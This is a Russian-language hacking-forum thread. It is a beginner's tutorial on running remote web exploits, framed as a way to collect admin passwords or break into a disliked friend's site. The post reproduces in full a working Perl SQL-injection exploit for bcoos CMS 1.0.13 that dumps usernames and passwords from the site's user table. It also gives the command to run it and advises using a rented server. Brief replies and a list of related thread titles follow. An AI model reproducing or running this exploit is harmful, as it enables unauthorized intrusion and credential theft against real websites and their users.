Как использовать эксплоиты? Для новичков

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Данная статья является пособием для новичков, в ней будет рассказано о том, как юзать эксплоиты для веб приложений.

Не знаю как сейчас обстоят дела с этой темой, но когда она была интересна мне - я не нашел никакого материала.

По сути, запуск эксплойтов вещь очень простая, все происходит по принципу "Нажал на кнопку - получил банан"



Ну а теперь переходим к самой сути, первое что тебе нужно знать, наверное это то, что такое эксплоит.



Эксплойт (англ. exploit — использовать) — это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода, который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы.

Для чего же они нужны? Эти експлоиты?

На самом деле все просто, вот допустим понадобилась тебе пачка админок (хотя бы штук 10) и ты не перерываешь кучу сайтов в поисках иньекци, xss и т.п. А находишь свежий эксплоит, находишь сайты на которых стоит уязвимый скрипт, запускаешь - получаешь пароли! Или ты ломаешь сайт ненавистного друга, на нем стоит популярная CMS c кучей модулей, попробуй-ка найди багу

Проще найти эксплоит и заюзать!

Я буду говорить только об удаленных эксплоитах. Это означает то, что вы не должны иметь доступ к компьютеру чтобы воспользоваться эксплоитом.

Эксплоиты в большинстве своем пишутся на таких языках как СИ и Perl (но есть и на множестве других, PHP например). Их можно найти на сайтах securitylab.ru(рус.), milw0rm.com(англ.).

Как же использовать этих "зверюшек"? На самом деле все очень просто, достаточно скачать нужный тебе эксплоит и запустить с требуемыми параметрами! Давай потренируемся? В виде подопытного кролика будем использовать CMS bcoos версии 1.0.13.

Вот код самого эксплоита:
Python:
#!/usr/bin/perl -w
#============================================
# bcoos 1.0.13 Remote SQL Injection Exploit
#============================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| '--------' | O .. CWH Underground Hacking Team ..
# '+---------------------------^----------|
# '\_,-------, _________________________|
# / XXXXXX /'| /
# / XXXXXX / '\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# '------'
#
#AUTHOR : CWH Underground
#DATE : 1 December 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : bcoos
#VERSION : 1.0.13 (Prior versions also maybe affected)
#VENDOR : http://www.bcoos.net/
#DOWNLOAD : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
######################################################
#
#Note: magic_quotes_gpc = off
#Addresses Modules Must be Installed
#
################################################################################
#######
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
################################################################################
#######


use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
print "\n==============================================\n";
print " Bcoos Remote SQL Injection Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| '--------' | O \n";
print " '+---------------------------^----------| \n";
print " '\_,-------, _________________________| \n";
print " / XXXXXX /'| / \n";
print " / XXXXXX / '\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " '------' \n";
print " \n";
print "Usage : ./xpl.pl <Target> <Data Limit>\n";
print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
exit();
}

$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$number = $ARGV[1];

print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "\n[+]Dump Username and Password\n";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27+and+1=2+union+select+1,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)+from+bcoos_users+limit+1+offset+".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
}
else {
print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
exit;
}
}

Все кто знаком с Perl сразу поймут что делает этот код, те-же кто знаком с другими языками, скорее всего догадаются.

Если-же ты не знаешь ни одного ЯП, то объясняю что делает этот код. Он запрашивает у тебя параметры (в данном случае URL и таймаут), проходи по линку (добавляя туда собственно говоря саму SQL injection), парсит страничку на наличие логина/пароля администратора и выдает тебе! Это все! Как видишь ничего сложного!

Также как и с другими эксплоитами. А вот для запуска, тебе необходим интерпретатор Perl (лучше конечно использовать дедик, где установлены множество компиляторов/интерпретаторов, ведь эксплоиты могу быть написаны на разных языках, а ставить к себе на машину весь этот "груз" не самый замечательный вариант!). Запускается эксплоит очень легко!

Код:
perl exploit_name.pl url timeout

Вот и все! У тебя на руках пароль
 
R

ruslord1

Не хватает инфы для школьников, как установить на свой компик с "видусом" - Perl )
А то начнут через блокнот открывать и писать в теме, что не работает)
 
  • Like
Реакции: MaksimusRime

Anorali

Pro Member
Сообщения
89
Реакции
128
Посетить сайт
Не хватает инфы для школьников, как установить на свой компик с "видусом" - Perl )
А то начнут через блокнот открывать и писать в теме, что не работает)

Не думаю, что школьники рыскают тут в поисках инфы по эксплойтам)
 
  • Like
Реакции: CMDfromBAT
Название темы
Автор Заголовок Раздел Ответы Дата
yaNaSvyazi [Wealth Whispers] [Udemy] Как использовать ChatGPT для YouTube (2023) Способы заработка 0
Anorali Интересно Как использовать Xploitspy для взлома телефонов Android? Полезные статьи 6
S Как правильно использовать фишинговые рассылки в рамках пентеста (СТАТЬЯ НЕ МОЯ) Полезные статьи 5
K Как использовать гипноз для работы с детьми - Кейн Другое 0
K Кейн - Как Использовать Гипноз Для Работы С Детьми Другое 0
K Интроверты. Как Использовать Особенности Своего Характера https://cloud.mail.ru/public/C8HP/DzGQz3Tdk Другое 0
J Как использовать скорость от провайдера Вопросы и интересы 1
Support81 $21 млн в крипте: как офицеры КСИР прикрылись «борьбой с мошенничеством» Новости в сети 0
Support81 Шифрование не спасет: как хакеры читают "защищенные" сообщения без взлома Новости в сети 0
Support81 Невидимая империя зла: как ИИ, дети и крипта строят цифровую империю Новости в сети 1
Support81 DNS без штанов: как нас сдают провайдерам по умолчанию Новости в сети 0
Support81 Комната 641А: как инженер AT&T раскрыл систему массовой слежки Новости в сети 0
Support81 "Чудо-решение" или маркетинг: как Google создает иллюзию объективности для продвижения технологий Новости в сети 0
Support81 Фрод в рекламе: как мошенники крадут бюджеты и что с этим делать Новости в сети 0
Support81 Невидимый взломщик: как обычные разговоры позволяют взломать GPT-4o Новости в сети 0
Support81 5 лет до точки невозврата: как квантовые компьютеры обрушат мировые банки Новости в сети 0
Support81 Вирус в заявке: как Zhong Stealer «ломает» компании через службу поддержки Новости в сети 0
Support81 Обмани себя сам: как ИИ-трейдеры ведут подписчиков к финансовому краху Новости в сети 0
Support81 Взлом, майнинг, выкуп: 5 хакеров придумали, как выжать из IT-гигантов все соки Новости в сети 0
Support81 CAPTCHA + PDF: как мошенники превратили Webflow в орудие фишинга Новости в сети 0
Support81 $16 млн и 1000 жертв: как хакеры Phobos попались в ловушку спецслужб Новости в сети 0
Support81 Мечта хакеров: как CVE-2024-52875 стала идеальным инструментом для кибератак Новости в сети 0
Support81 StarkRDP теперь LakeVPS: как злоумышленники возрождают подпольные рынки за считанные дни Новости в сети 0
Support81 Дешевле – не значит лучше: как уязвимости DeepSeek уничтожают защиту бизнеса Новости в сети 1
Support81 Важно!!! MMS возвращается: как устаревший протокол стал оружием криптомошенников Новости в сети 0
Support81 Chrome, Firefox и Edge: как Flesh Stealer стал ночным кошмаром для браузеров Новости в сети 0
Support81 Майнеры в облаке: как хакеры годами добывают криптовалюту за чужой счёт Новости в сети 0
Ёшкин_кот Статья Как скрыть цифровой след в интернете: практическое руководство. Полезные статьи 0
Support81 Из одной банды ‒ сотня новых: как полицейские облавы укрепили армию шантажистов Новости в сети 0
Support81 Машина против машины: как MintsLoader избегает обнаружения Новости в сети 0
wrangler65 Интересно Как удалить информацию о себе из интернета: подробная инструкция Полезные статьи 0
Support81 Банки, логистика и мошенники: как работает фишинговая «Premium Panel» Новости в сети 0
Support81 Тайны кода: как спецслужбы США используют ошибки в ПО Новости в сети 0
Support81 GhostGPT: как Telegram-бот из новичков делает профи криминального ИИ Новости в сети 1
Support81 UI-TARS: ByteDance научила ИИ работать с компьютером как человек Новости в сети 0
Support81 Скамеры дуреют с этой прикормки: как секретный токен ФБР вывел мошенников на чистую воду Новости в сети 0
Support81 12 недель на решение: как Великобритания планирует побороть кибервымогательство Новости в сети 0
wrangler65 Интересно Как сэкономить до 70% на переводах USDT TRC-20 через энергию Полезные статьи 0
Support81 $787 тысяч исчезли за секунды: как хакеры обошли защиту Orange Finance Новости в сети 0
Support81 LockBit 4.0: как вымогатели планируют возвращать утраченные позиции Новости в сети 0
Support81 Личное в публичное: как простой вызов такси оборачивается потерей данных Новости в сети 0
Support81 Жертвы жадности: как работает новая схема кражи криптовалют на YouTube Новости в сети 0
Support81 Лица на распродаже: как утечки данных помогают хакерам обходить проверки личности Новости в сети 0
Support81 Генеративный ИИ на службе зла: как тысячи вирусов избегают обнаружения Новости в сети 0
Support81 DoS, RCE и утечки данных: как Prometheus становится оружием хакеров Новости в сети 0
Support81 $88 миллионов добычи: как IT-воины КНДР шесть лет водили США за нос Новости в сети 0
Support81 BadRAM: как взломать облака Amazon, Google и Microsoft за $10 Новости в сети 0
Support81 $16 миллионов похищено через LinkedIn: как хакеры обманули Rain Новости в сети 0
Support81 Rockstar 2FA: как хакеры обходят многофакторную защиту в два клика Новости в сети 0
Support81 Эксплойт дня: как баг в кsthunk.sys превращается в цифровое оружие Новости в сети 0

Название темы